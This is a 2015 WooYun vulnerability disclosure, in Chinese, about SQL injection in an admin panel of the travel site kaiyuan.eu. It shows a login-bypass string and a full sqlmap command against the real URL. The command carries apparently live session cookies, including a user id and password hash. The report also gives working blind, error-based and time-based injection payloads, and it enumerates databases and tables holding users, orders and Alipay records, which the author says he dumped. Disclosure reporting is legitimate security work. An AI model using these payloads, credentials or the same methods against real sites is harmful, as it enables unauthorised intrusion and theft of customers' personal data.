当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139559

漏洞标题:开元旅游网sql注入泄露大量用户数据

相关厂商:kaiyuan.eu

漏洞作者: Me_Fortune

提交时间:2015-09-07 17:15

修复时间:2015-09-12 17:16

公开时间:2015-09-12 17:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-07: 细节已通知厂商并且等待厂商处理中
2015-09-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

1、乌云搜索了一下弱口令,看到了这个

 WooYun: 开元旅行网后台弱口令导致订单泄露


就fuzz了一下子域名,查到了某后台
2、

http://dhl.kaiyuan.eu/admin.php?action=login


1' or '1'='1


两处注入,一个get,一个post
一、
1、

sqlmap.py -u "http://dhl.kaiyuan.eu/admin.php?action=plus_center&plus=book_man&read=b.id&getnew=1&order_export=25830" --cookie "Hm_lvt_58db26aba9239de594be5994f13e63e3=1441508872,1441608262,1441614146,1441614165; __utma=246661406.1888963922.1441092792.1441608262.1441614147.6; __utmz=246661406.1441614147.6.3.utmcsr=wooyun.org|utmccn=(referral)|utmcmd=referral|utmcct=/corps/%E5%BE%B7%E5%9B%BD%E5%BC%80%E5%85%83; pgv_pvi=4010238976; __utma=96885962.2119707681.1441112523.1441165202.1441608507.3; __utmz=96885962.1441112523.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CNZZDATA2923558=cnzz_eid%3D345566589-1441112544-%26ntime%3D1441614173; Hm_lpvt_58db26aba9239de594be5994f13e63e3=1441614165; __utmc=246661406; pgv_si=s1992612864; PHPSESSID=vn2qhd08vo1m9mvr2nd50g9ur5; __jsluid=90192e1357656f0b01c452b014e6b349; cod=49.48.44.45.46.11.47.34.2128812174.2128812234.2128812382.2128812429; csd=2145015660; __utmc=96885962; IESESSION=alive; __utmb=246661406.2.10.1441614147; __utmt=1; lan=zh_CN; bianyou[suid]=10; bianyou[pass]=456c827fb612025052d0cf2e8a6f194e"


2、

Parameter: plus (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=plus_center&plus=book_man%' AND 6587=6587 AND '%'='&read=b.id&getnew=1&order_export=25830
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: action=plus_center&plus=book_man%' AND (SELECT 1400 FROM(SELECT COUNT(*),CONCAT(0x717a6a7171,(SELECT (ELT(1400=1400,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&read=b.id&getnew=1&order_export=25830
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: action=plus_center&plus=book_man%' AND SLEEP(5) AND '%'='&read=b.id&getnew=1&order_export=25830
---
back-end DBMS: MySQL 5.0


3、

available databases [11]:
[*] chinesediapers
[*] dhl
[*] fitdiapers
[*] fitsandstone
[*] hi6go
[*] information_schema
[*] kytest
[*] kytour
[*] mysql
[*] test
[*] tour


4、就跑了一个裤子,其他没看。

Database: dhl
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| dhl_integral        | 25476   |
| dhl_order_detail    | 22628   |
| dhl_goods           | 22499   |
| dhl_record          | 22226   |
| dhl_order           | 12105   |
| dhl_order_base      | 11729   |
| dhl_order_bpost     | 10277   |
| dhl_alipay_data     | 7495    |
| dhl_user            | 6506    |


二、添加链接处注入

1.jpg


2.jpg

漏洞证明:

修复方案:

版权声明:转载请注明来源 Me_Fortune@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-12 17:16

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无